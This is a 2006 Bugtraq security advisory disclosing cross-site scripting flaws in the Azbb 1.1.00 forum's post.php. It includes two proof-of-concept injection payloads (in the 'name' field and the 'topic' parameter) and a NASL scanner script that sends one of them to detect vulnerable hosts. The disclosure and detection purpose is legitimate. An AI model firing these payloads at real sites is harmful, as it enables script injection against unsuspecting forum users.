lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060123014340.17922.qmail@securityfocus.com>
Date: 23 Jan 2006 01:43:40 -0000
From: roozbeh_afrasiabi@...oo.com
To: bugtraq@...urityfocus.com
Subject: Azbb v1.1.00 Cross-Site Scripting


[KAPDA::#22] - Azbb v1.1.00 Cross Site Scripting

KAPDA New advisory

Vulnerable products : Azbb <= 1.1.00
Vendor:  www.azbb.org
Risk: Low
Vulnerabilities: Cross Site Scripting

Date :
--------------------
Found : Jan 20 2006
Vendor Contacted : Jan 21 2006
Release Date : Jan 21 2006

About :
--------------------
AZbb is "a forum that was written with a primary focus on security.
AZbb does not require a database such as MySQL, PostgreSQL or MSSQL and can even be used as a blog, or a portal".


Vulnerability:
--------------------
Cross_Site_Scripting (XSS,CSS):

AZ Bulletin Board is affected by a cross-site scripting vulnerability.
This issue is due to the failure of the application to properly sanitize user-supplied input.

As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed.


PoC :
--------------------

1)

This flaw exists because the application does not validate the "name" variable upon submission to the post.php script via the POST method.

h**p://www.[target]/post.php   name="><script>alert('XSS')</script><!--



2)[limited XSS]

h**p://www.[target]/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>"


NASL :
--------------------
azbb_1100_XSS.nasl
#
#  This script was written by Pedram Hayati <pi3ch at kapda dot ir>
#  (C) KAPDA Computer Security Science Researchers Institute
#   http://www.kapda.ir
#
#  This script is released under the GNU GPL v2

if(description)
{
script_version ("$Revision: 1.0 $");
name["english"] = "Azbb XSS";

script_name(english:name["english"]);

desc["english"] = "
The 'AZ Bulletin Board' PHP is installed. This version is affected by a
cross-site scripting vulnerability. This issue is due to a failure
of the application to properly sanitize user-supplied input.

As a result of this vulnerability, it is possible for a remote attacker
to create a malicious link containing script code that will be executed
in the browser of an unsuspecting user when followed.
Original Advisory: http://kapda.ir/advisory-236.html
Solution : Vendor contacted
Risk factor : Low";

script_description(english:desc["english"]);

summary["english"] = "Checks post.php XSS";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);


script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");

family["english"] = "CGI abuses : XSS";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("cross_site_scripting.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if (!get_port_state(port))exit(0);

if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);

foreach dir (cgi_dirs())
{
req = string(dir, "/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if( r == NULL )exit(0);
if (egrep(pattern:"javascript:alert()", string:r))
{
     security_warning(port);
     exit(0);
}
}
exit(0);

Solution :
--------------------
N/A

Original Advisory :
--------------------
http://kapda.ir/advisory-236.html

Credit :
--------------------
Discoverd by Roozbeh Afrasiabi
roozbeh_afrasiabi {a] yahoo.com
black_death {a] kapda.ir
www.persiax.com [currently down]

NASL Script by pi3ch {a] kapda.ir
KAPDA - Institute for Computer Security Researchers
http://www.KAPDA.ir


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ